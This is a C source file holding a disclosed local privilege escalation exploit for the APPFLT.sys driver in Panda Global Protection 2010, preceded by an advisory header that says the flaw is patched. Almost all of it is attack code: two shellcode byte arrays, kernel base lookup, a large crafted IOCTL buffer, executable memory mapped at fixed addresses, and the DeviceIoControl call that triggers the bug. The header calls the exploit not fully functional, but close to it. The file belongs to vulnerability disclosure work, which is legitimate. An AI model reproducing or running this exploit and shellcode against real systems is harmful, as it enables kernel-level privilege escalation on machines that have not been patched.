417 lines
No EOL
16 KiB
C
417 lines
No EOL
16 KiB
C
#include <windows.h>
|
|
#include <string.h>
|
|
#include <ddk/ntapi.h>
|
|
#include <tlhelp32.h>
|
|
|
|
#define SystemModuleInfo 11
|
|
|
|
/*
|
|
Program : Panda Global Protection 2010 (3.01.00)
|
|
Homepage : http://www.pandasecurity.com
|
|
Discovery : 2010/04/09
|
|
Author Contacted : 2010/07/15
|
|
Status of vuln : Patched !
|
|
Found by : Heurs
|
|
This Advisory : Heurs
|
|
Contact : s.leberre@sysdream.com
|
|
|
|
|
|
//----- Application description
|
|
|
|
|
|
Antivirus Global Protection 2010 is the most complete product, with everything
|
|
you need to protect your computer and information. It protects you from viruses,
|
|
spyware, rootkits, hackers, online fraud, identity theft and all other Internet
|
|
threats. The anti-spam engine will keep your inbox free from junk mail while the
|
|
Parental Control feature will keep your family safe when using the Internet. You
|
|
can also back up important files (documents, music, photos, etc.) to a CD/DVD or
|
|
online (5GB free space available) and restore them in case of accidental loss or
|
|
damage. And thanks to the most innovative and new detection technologies and improved
|
|
Collective Intelligence, the solution is now much faster than previous versions.
|
|
|
|
//----- Description of vulnerability
|
|
|
|
APPFLT.sys driver don't check inputs integers of an IOCTL. An exception can be
|
|
thrown if we modify one DWORD.
|
|
Exploit isn't functional but with few work it can be a local privilege escalation.
|
|
|
|
//----- Credits
|
|
|
|
http://www.sysdream.com
|
|
http://www.hackinparis.com/
|
|
http://ghostsinthestack.org
|
|
|
|
s.leberre at sysdream dot com
|
|
heurs at ghostsinthestack dot org
|
|
|
|
//----- Greetings
|
|
|
|
Mysterie
|
|
|
|
*/
|
|
|
|
|
|
char ShellcodeMaster[] =
|
|
"\x33\xf6\x33\xff\x64\xa1\x24\x01\x00\x00\x8b\x40\x44\x05\x88\x00"
|
|
"\x00\x00\x8b\xd0\x8b\x58\xfc\x81\xfb\x41\x41\x41\x41\x75\x02\x8b"
|
|
"\xf0\x83\xfb\x04\x75\x02\x8b\xf8\x8b\xd6\x23\xd7\x85\xd2\x75\x08"
|
|
"\x8b\x00\x3b\xc2\x75\xde\xeb\x10\x8b\xc7\xb9\x40\x00\x00\x00\x03"
|
|
"\xc1\x8b\x00\x8b\xde\x89\x04\x19\xba\x11\x11\x11\x11\xb9\x22\x22"
|
|
"\x22\x22\xb8\x3b\x00\x00\x00\x8e\xe0\x0f\x35";
|
|
|
|
char RealShellcode[] =
|
|
"\x2b\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x15"
|
|
"\xf3\x1d\xb8\x83\xeb\xfc\xe2\xf4\xe9\x1b\x59\xb8\x15\xf3\x96\xfd"
|
|
"\x29\x78\x61\xbd\x6d\xf2\xf2\x33\x5a\xeb\x96\xe7\x35\xf2\xf6\xf1"
|
|
"\x9e\xc7\x96\xb9\xfb\xc2\xdd\x21\xb9\x77\xdd\xcc\x12\x32\xd7\xb5"
|
|
"\x14\x31\xf6\x4c\x2e\xa7\x39\xbc\x60\x16\x96\xe7\x31\xf2\xf6\xde"
|
|
"\x9e\xff\x56\x33\x4a\xef\x1c\x53\x9e\xef\x96\xb9\xfe\x7a\x41\x9c"
|
|
"\x11\x30\x2c\x78\x71\x78\x5d\x88\x90\x33\x65\xb4\x9e\xb3\x11\x33"
|
|
"\x65\xef\xb0\x33\x7d\xfb\xf6\xb1\x9e\x73\xad\xb8\x15\xf3\x96\xd0"
|
|
"\x29\xac\x2c\x4e\x75\xa5\x94\x40\x96\x33\x66\xe8\x7d\x8d\xc5\x5a"
|
|
"\x66\x9b\x85\x46\x9f\xfd\x4a\x47\xf2\x90\x70\xdc\x3b\x96\x65\xdd"
|
|
"\x15\xf3\x1d\xb8";
|
|
|
|
typedef struct _SYSTEM_MODULE_ENTRY
|
|
{
|
|
ULONG Unused;
|
|
ULONG Always0;
|
|
PVOID ModuleBaseAddress;
|
|
ULONG ModuleSize;
|
|
ULONG Unknown;
|
|
ULONG ModuleEntryIndex;
|
|
USHORT ModuleNameLength;
|
|
USHORT ModuleNameOffset;
|
|
CHAR ModuleName [256];
|
|
} SYSTEM_MODULE_ENTRY, * PSYSTEM_MODULE_ENTRY;
|
|
|
|
|
|
DWORD GetDataSection(HANDLE ImageBase){
|
|
IMAGE_DOS_HEADER * mDosHeader;
|
|
IMAGE_NT_HEADERS * mNtHeader;
|
|
IMAGE_SECTION_HEADER * mSecHeader;
|
|
int i;
|
|
|
|
mDosHeader = (PIMAGE_DOS_HEADER) ImageBase;
|
|
if (mDosHeader->e_magic != 0x5A4D) {
|
|
return 0;
|
|
}
|
|
|
|
mNtHeader = (PIMAGE_NT_HEADERS) (mDosHeader->e_lfanew + ImageBase);
|
|
if (mNtHeader->Signature != 0x00004550) {
|
|
return 0;
|
|
}
|
|
|
|
mSecHeader = (PIMAGE_SECTION_HEADER) (mDosHeader->e_lfanew + sizeof(IMAGE_NT_HEADERS) + ImageBase);
|
|
for (i=0; i<mNtHeader->FileHeader.NumberOfSections; i++){
|
|
if (!strcmp(mSecHeader->Name, ".data"))
|
|
return mSecHeader->VirtualAddress;
|
|
mSecHeader++;
|
|
}
|
|
|
|
return 0;
|
|
}
|
|
|
|
PVOID KernelGetModuleBase(PCHAR pModuleName)
|
|
{
|
|
PVOID pModuleBase = NULL;
|
|
PULONG pSystemInfoBuffer = NULL;
|
|
|
|
NTSTATUS status = STATUS_INSUFFICIENT_RESOURCES;
|
|
ULONG SystemInfoBufferSize = 0;
|
|
|
|
status = ZwQuerySystemInformation(SystemModuleInfo,
|
|
&SystemInfoBufferSize,
|
|
0,
|
|
&SystemInfoBufferSize);
|
|
|
|
if (!SystemInfoBufferSize){
|
|
return NULL;
|
|
}
|
|
|
|
pSystemInfoBuffer = (PULONG)malloc(SystemInfoBufferSize*2);
|
|
|
|
if (!pSystemInfoBuffer){
|
|
return NULL;
|
|
}
|
|
|
|
memset(pSystemInfoBuffer, 0, SystemInfoBufferSize*2);
|
|
|
|
status = ZwQuerySystemInformation(SystemModuleInfo,
|
|
pSystemInfoBuffer,
|
|
SystemInfoBufferSize*2,
|
|
&SystemInfoBufferSize);
|
|
|
|
|
|
if (NT_SUCCESS(status))
|
|
{
|
|
PSYSTEM_MODULE_ENTRY pSysModuleEntry =
|
|
(PSYSTEM_MODULE_ENTRY)((PSYSTEM_MODULE_INFORMATION)(pSystemInfoBuffer))->Module;
|
|
ULONG i;
|
|
|
|
for (i = 0; i <((PSYSTEM_MODULE_INFORMATION)(pSystemInfoBuffer))->Count; i++)
|
|
{
|
|
if (_stricmp(pSysModuleEntry[i].ModuleName +
|
|
pSysModuleEntry[i].ModuleNameOffset, pModuleName) == 0)
|
|
{
|
|
pModuleBase = pSysModuleEntry[i].ModuleBaseAddress;
|
|
break;
|
|
}
|
|
}
|
|
}
|
|
|
|
if(pSystemInfoBuffer) {
|
|
free(pSystemInfoBuffer);
|
|
}
|
|
|
|
return pModuleBase;
|
|
} // end KernelGetModuleBase()
|
|
|
|
int __cdecl main(int argc, char* argv[])
|
|
{
|
|
HANDLE hDevice = (HANDLE) 0xffffffff;
|
|
DWORD NombreByte;
|
|
DWORD Crashing[] = {
|
|
0xaaaaaaaa, 0xbbbbbbbb, 0xcccccccc, 0xdddddddd,
|
|
0xeeeeeeee, 0x11111111, 0x001cfdea, 0x002dc6c0,
|
|
0x000000a8, 0x0044005c, 0x00760065, 0x00630069,
|
|
0x005c0065, 0x00610048, 0x00640072, 0x00690064,
|
|
0x006b0073, 0x006f0056, 0x0075006c, 0x0065006d,
|
|
0x005c0031, 0x00720050, 0x0067006f, 0x00610072,
|
|
0x0020006d, 0x00690046, 0x0065006c, 0x005c0073,
|
|
0x00610050, 0x0064006e, 0x00200061, 0x00650053,
|
|
0x00750063, 0x00690072, 0x00790074, 0x0050005c,
|
|
0x006e0061, 0x00610064, 0x00470020, 0x006f006c,
|
|
0x00610062, 0x0020006c, 0x00720050, 0x0074006f,
|
|
0x00630065, 0x00690074, 0x006e006f, 0x00320020,
|
|
0x00310030, 0x005c0030, 0x00650057, 0x00500062,
|
|
0x006f0072, 0x00790078, 0x0065002e, 0x00650078,
|
|
0x00112200, 0x00112200, 0x00112200, 0x00112200,
|
|
0x00112200, 0x00112200, 0x00112200, 0x00112200,
|
|
0x00112200, 0x00112200, 0x00112200, 0x00112200,
|
|
0x00112200, 0x00112200, 0x00112200, 0x00112200,
|
|
0x00112200, 0x00112200, 0x00112200, 0x00112200,
|
|
0x00112200, 0x00112200, 0x00112200, 0x00112200,
|
|
0x00112200, 0x00112200, 0x00112200, 0x00112200,
|
|
0x00112200, 0x00112200, 0x00112200, 0x00112200,
|
|
0x00112200, 0x00112200, 0x00112200, 0x00112200,
|
|
0x00112200, 0x00112200, 0x00112200, 0x00112200,
|
|
0x00112200, 0x00112200, 0x00112200, 0x00112200,
|
|
0x00112200, 0x00112200, 0x00112200, 0x00112200,
|
|
0x00112200, 0x00112200, 0x00112200, 0x00112200,
|
|
0x00112200, 0x00112200, 0x00112200, 0x00112200,
|
|
0x00112200, 0x00112200, 0x00112200, 0x00112200,
|
|
0x00112200, 0x00112200, 0x00112200, 0x00112200,
|
|
0x00112200, 0x00112200, 0x00112200, 0x00112200,
|
|
0x00112200, 0x00112200, 0x00112200, 0x00112200,
|
|
0x00112200, 0x00112200, 0x00112200, 0x00112200,
|
|
0x00112200, 0x00112200, 0x00112200, 0x00112200,
|
|
0x00112200, 0x00112200, 0x00112200, 0x00112200,
|
|
0x00112200, 0x00112200, 0x00112200, 0x00112200,
|
|
0x00112200, 0x00112200, 0x00112200, 0x00112200,
|
|
0x00112200, 0x00112200, 0x00112200, 0x00112200,
|
|
0x00112200, 0x00112200, 0x00112200, 0x00112200,
|
|
0x00112200, 0x00112200, 0x00112200, 0x00112200,
|
|
0x00112200, 0x00112200, 0x00112200, 0x00112200,
|
|
0x00112200, 0x00112200, 0x00112200, 0x00112200,
|
|
0x00112200, 0x00112200, 0x00112200, 0x00112200,
|
|
0x00112200, 0x00112200, 0x00112200, 0x00112200,
|
|
0x00112200, 0x00112200, 0x00112200, 0x00112200,
|
|
0x00112200, 0x00112200, 0x00112200, 0x00112200,
|
|
0x00112200, 0x00112200, 0x00112200, 0x00112200,
|
|
0x00112200, 0x00112200, 0x00112200, 0x00112200,
|
|
0x00112200, 0x00112200, 0x00112200, 0x00112200,
|
|
0x00112200, 0x00112200, 0x00112200, 0x00112200,
|
|
0x00112200, 0x00112200, 0x00112200, 0x00112200,
|
|
0x00112200, 0x00112200, 0x00112200, 0x00112200,
|
|
0x00112200, 0x00112200, 0x00112200, 0x00112200,
|
|
0x00112200, 0x00112200, 0x00112200, 0x00112200,
|
|
0x00112200, 0x00112200, 0x00112200, 0x00112200,
|
|
0x00112200, 0x00112200, 0x00112200, 0x00112200,
|
|
0x00112200, 0x00112200, 0x00112200, 0x00112200,
|
|
0x00112200, 0x00112200, 0x00112200, 0x00112200,
|
|
0x00112200, 0x00112200, 0x00112200, 0x00112200,
|
|
0x00112200, 0x00112200, 0x00112200, 0x00112200,
|
|
0x00112200, 0x00112200, 0x00112200, 0x00112200,
|
|
0x00112200, 0x00112200, 0x00112200, 0x00112200,
|
|
0x00112200, 0x00112200, 0x00112200, 0x00112200,
|
|
0x00112200, 0x00112200, 0x00112200, 0x00112200,
|
|
0x00112200, 0x00112200, 0x00112200, 0x00112200,
|
|
0x00112200, 0x00112200, 0x00112200, 0x00112200,
|
|
0x00112200, 0x19653420, 0x19653420, 0x19653420,
|
|
0x19653420, 0x19653420, 0x19653420, 0x19653420,
|
|
0x19653420, 0x19653420, 0x19653420, 0x19653420,
|
|
0x19653420, 0x19653420, 0x19653420, 0x19653420,
|
|
0x19653420, 0x19653420, 0x19653420, 0x19653420,
|
|
0x19653420, 0x19653420, 0x19653420, 0x19653420,
|
|
0x19653420, 0x19653420, 0x19653420, 0x19653420,
|
|
0x19653420, 0x19653420, 0x19653420, 0x19653420,
|
|
0x19653420, 0x19653420, 0x19653420, 0x19653420,
|
|
0x19653420, 0x19653420, 0x19653420, 0x19653420,
|
|
0x19653420, 0x19653420, 0x19653420, 0x19653420,
|
|
0x19653420, 0x19653420, 0x19653420, 0x19653420,
|
|
0x19653420, 0x19653420, 0x19653420, 0x19653420,
|
|
0x19653420, 0x19653420, 0x19653420, 0x19653420,
|
|
0x19653420, 0x19653420, 0x19653420, 0x19653420,
|
|
0x19653420, 0x19653420, 0x19653420, 0x19653420,
|
|
0x19653420, 0x19653420, 0x19653420, 0x19653420,
|
|
0x19653420, 0x19653420, 0x19653420, 0x19653420,
|
|
0x19653420, 0x19653420, 0x19653420, 0x19653420,
|
|
0x19653420, 0x19653420, 0x19653420, 0x19653420,
|
|
0x19653420, 0x19653420, 0x19653420, 0x19653420,
|
|
0x19653420, 0x19653420, 0x19653420, 0x19653420,
|
|
0x19653420, 0x19653420, 0x19653420, 0x19653420,
|
|
0x19653420, 0x19653420, 0x19653420, 0x19653420,
|
|
0x19653420, 0x19653420, 0x19653420, 0x19653420,
|
|
0x19653420, 0x19653420, 0x19653420, 0x19653420,
|
|
0x19653420, 0x19653420, 0x19653420, 0x19653420,
|
|
0x19653420, 0x19653420, 0x19653420, 0x19653420,
|
|
0x19653420, 0x19653420, 0x19653420, 0x19653420,
|
|
0x19653420, 0x19653420, 0x19653420, 0x19653420,
|
|
0x19653420, 0x19653420, 0x19653420, 0x19653420,
|
|
0x19653420, 0x19653420, 0x19653420, 0x19653420,
|
|
0x19653420, 0x19653420, 0x19653420, 0x19653420,
|
|
0x19653420, 0x19653420, 0x19653420, 0x19653420,
|
|
0x19653420, 0x19653420, 0x19653420, 0x19653420,
|
|
0x19653420, 0x19653420, 0x19653420, 0x19653420,
|
|
0x19653420, 0x19653420, 0x19653420, 0x19653420,
|
|
0x19653420, 0x19653420, 0x19653420, 0x19653420,
|
|
0x19653420, 0x19653420, 0x19653420, 0x19653420,
|
|
0x19653420, 0x19653420, 0x19653420, 0x19653420,
|
|
0x19653420, 0x19653420, 0x19653420, 0x19653420,
|
|
0x19653420, 0x19653420, 0x19653420, 0x19653420,
|
|
0x19653420, 0x19653420, 0x19653420, 0x19653420,
|
|
0x19653420, 0x19653420, 0x19653420, 0x19653420,
|
|
0x19653420, 0x19653420, 0x19653420, 0x19653420,
|
|
0x19653420, 0x19653420, 0x19653420, 0x19653420,
|
|
0x19653420, 0x19653420, 0x19653420, 0x19653420,
|
|
0x19653420, 0x19653420, 0x19653420, 0x19653420,
|
|
0x19653420, 0x19653420, 0x19653420, 0x19653420,
|
|
0x19653420, 0x19653420, 0x19653420, 0x19653420,
|
|
0x19653420, 0x19653420, 0x19653420, 0x19653420,
|
|
0x19653420, 0x19653420, 0x19653420, 0x19653420,
|
|
0x19653420, 0x19653420, 0x19653420, 0x19653420,
|
|
0x19653420, 0x19653420, 0x19653420, 0x19653420,
|
|
0x19653420, 0x19653420, 0x19653420, 0x19653420,
|
|
0x19653420, 0x19653420, 0x19653420, 0x19653420,
|
|
0x19653420, 0x19653420, 0x19653420, 0x19653420,
|
|
0x19653420, 0x19653420, 0x19653420, 0x19653420,
|
|
0x19653420, 0x19653420, 0x19653420, 0x19653420,
|
|
0x19653420, 0x19653420, 0x19653420, 0x19653420,
|
|
0x19653420, 0x19653420, 0x19653420, 0x19653420,
|
|
0x19653420, 0x19653420, 0x19653420, 0x19653420,
|
|
0x19653420, 0x19653420, 0x19653420, 0x19653420,
|
|
0x19653420, 0x19653420, 0x19653420, 0x19653420,
|
|
0x19653420, 0x19653420, 0x19653420, 0x19653420,
|
|
0x19653420, 0x19653420, 0x19653420, 0x19653420,
|
|
0x19653420, 0x19653420, 0x19653420, 0x19653420,
|
|
0x19653420, 0x19653420, 0x19653420, 0x19653420,
|
|
0x19653420, 0x19653420, 0x19653420, 0x19653420,
|
|
0x19653420, 0x19653420, 0x19653420, 0x19653420,
|
|
0x19653420, 0x19653420, 0x19653420, 0x19653420,
|
|
0x19653420, 0x19653420, 0x19653420, 0x19653420,
|
|
0x19653420, 0x19653420, 0x19653420, 0x19653420,
|
|
0x19653420, 0x19653420, 0x19653420, 0x19653420,
|
|
0x19653420, 0x19653420, 0x19653420, 0x19653420,
|
|
0x19653420, 0x19653420, 0x19653420, 0x19653420,
|
|
0x19653420, 0x19653420, 0x19653420, 0x19653420,
|
|
0x19653420, 0x19653420, 0x19653420, 0x19653420,
|
|
0x19653420, 0x19653420, 0x19653420, 0x19653420,
|
|
0x19653420, 0x19653420, 0x19653420, 0x19653420,
|
|
0x19653420, 0x19653420, 0x19653420, 0x19653420,
|
|
0x19653420, 0x19653420, 0x19653420, 0x19653420,
|
|
0x19653420, 0x19653420, 0x19653420, 0x19653420,
|
|
0x19653420, 0x19653420, 0x19653420, 0x19653420,
|
|
0x19653420, 0x19653420, 0x19653420, 0x19653420,
|
|
0x19653420, 0x19653420, 0x19653420, 0x19653420,
|
|
0x19653420, 0x19653420, 0x19653420, 0x19653420,
|
|
0x19653420, 0x19653420, 0x19653420, 0x19653420,
|
|
0x19653420, 0x19653420, 0x19653420, 0x19653420,
|
|
0x19653420, 0x19653420, 0x19653420, 0x19653420,
|
|
0x19653420, 0x19653420, 0x19653420, 0x19653420,
|
|
0x19653420, 0x19653420, 0x19653420, 0x19653420,
|
|
0x19653420, 0x19653420, 0x19653420, 0x19653420,
|
|
0x19653420, 0x19653420, 0x19653420, 0x19653420,
|
|
0x19653420, 0x19653420, 0x19653420, 0x19653420,
|
|
0x19653420, 0x19653420, 0x19653420, 0x19653420,
|
|
0x19653420, 0x19653420, 0x19653420, 0x19653420,
|
|
0x19653420, 0x19653420, 0x19653420, 0x19653420,
|
|
0x19653420, 0x19653420, 0x19653420, 0x19653420,
|
|
0x19653420, 0x19653420, 0x19653420, 0x19653420,
|
|
0x19653420, 0x19653420, 0x19653420, 0x19653420,
|
|
0x19653420, 0x19653420, 0x19653420, 0x19653420,
|
|
0x19653420, 0x19653420, 0x19653420, 0x19653420,
|
|
0x19653420, 0x19653420, 0x19653420, 0x19653420,
|
|
0x19653420, 0x19653420, 0x19653420, 0x19653420,
|
|
0x19653420, 0x19653420, 0x19653420, 0x19653420,
|
|
0x19653420, 0x19653420, 0x19653420, 0x19653420,
|
|
0x19653420, 0x19653420, 0x19653420, 0x19653420,
|
|
0x19653420, 0x19653420, 0x19653420, 0x19653420,
|
|
0x19653420, 0x19653420, 0x19653420, 0x19653420,
|
|
0x19653420, 0x19653420, 0x19653420, 0x19653420,
|
|
0x19653420, 0x19653420, 0x19653420, 0x19653420,
|
|
0x19653420, 0x19653420, 0x19653420, 0x19653420,
|
|
0x19653420, 0x19653420, 0x19653420, 0x19653420,
|
|
0x19653420, 0x19653420, 0x19653420, 0x19653420,
|
|
0x19653420, 0x19653420, 0x19653420, 0x19653420,
|
|
0x19653420, 0x19653420, 0x19653420, 0x19653420,
|
|
0x19653420, 0x19653420, 0x19653420, 0x19653420,
|
|
0x19653420, 0x19653420, 0x19653420, 0x19653420,
|
|
0x19653420, 0x19653420, 0x19653420, 0x19653420,
|
|
0x19653420, 0x19653420, 0x19653420, 0x19653420,
|
|
0x19653420, 0x19653420, 0x19653420, 0x19653420,
|
|
0x19653420, 0x19653420, 0x19653420, 0x19653420,
|
|
0x19653420, 0x19653420, 0x19653420, 0x19653420,
|
|
0x19653420, 0x19653420, 0x19653420, 0x19653420,
|
|
0x19653420, 0x19653420, 0x19653420, 0x19653420,
|
|
0x19653420, 0x19653420, 0x19653420, 0x19653420,
|
|
0x19653420
|
|
};
|
|
char out[sizeof(Crashing)];
|
|
DWORD ShellcodeToExecute;
|
|
DWORD KernelImageBase;
|
|
DWORD KernelPointerDeref;
|
|
DWORD VirtImageBaseKnl;
|
|
DWORD NullAddress;
|
|
KEVENT NewKevent;
|
|
int i = 0x1000;
|
|
|
|
printf("Local Privilege Escalation - Panda Global Protection 2010 (3.01.00)\n\n");
|
|
hDevice = CreateFile("\\\\.\\AppFlt",GENERIC_READ|GENERIC_WRITE,0,NULL,OPEN_EXISTING,0,NULL);
|
|
|
|
ShellcodeToExecute = (DWORD) VirtualAlloc((void*)0x00110000, 0x10000, MEM_RESERVE, PAGE_EXECUTE_READWRITE);
|
|
ShellcodeToExecute = (DWORD) VirtualAlloc((void*)0x00110000, 0x10000, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
|
|
|
|
|
|
ShellcodeToExecute = (DWORD) VirtualAlloc((void*)0x19653420, 0x1000, MEM_RESERVE, PAGE_EXECUTE_READWRITE);
|
|
ShellcodeToExecute = (DWORD) VirtualAlloc((void*)0x19653420, 0x1000, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
|
|
|
|
memcpy((void*)0x19653420, ShellcodeMaster, sizeof(ShellcodeMaster));
|
|
|
|
KernelImageBase = (DWORD) KernelGetModuleBase("ntoskrnl.exe");
|
|
|
|
if (!KernelImageBase){
|
|
KernelImageBase = (DWORD) KernelGetModuleBase("ntkrnlpa.exe");
|
|
VirtImageBaseKnl = (DWORD) LoadLibrary("ntkrnlpa.exe");
|
|
KernelPointerDeref = KernelImageBase + GetDataSection((HANDLE)VirtImageBaseKnl) + 0x3C;
|
|
} else {
|
|
VirtImageBaseKnl = (DWORD) LoadLibrary("ntoskrnl.exe");
|
|
KernelPointerDeref = KernelImageBase + 0x3C;
|
|
}
|
|
|
|
Crashing[469] = (KernelPointerDeref - 0x750) ^ 0x19653420;
|
|
|
|
memcpy((PVOID)0x001129f9, &Crashing[60], 4);
|
|
memcpy((PVOID)0x001129f9 + 0x4, &Crashing[60], 4);
|
|
memcpy((PVOID)0x001129f9 + 0x8, &Crashing[60], 4);
|
|
memcpy((PVOID)0x001129f9 + 0xC, &Crashing[60], 4);
|
|
memcpy((PVOID)0x001129f9 + 0x10, &Crashing[60], 4);
|
|
memcpy((PVOID)0x001129f9 + 0x16, &Crashing[60], 4);
|
|
|
|
DeviceIoControl(hDevice,0x06660E1C,Crashing,sizeof(Crashing),out,sizeof(Crashing),&NombreByte,NULL);
|
|
|
|
printf("Sploit Send.\nhDevice = %x\n", hDevice);
|
|
CloseHandle(hDevice);
|
|
getch();
|
|
return 0;
|
|
} |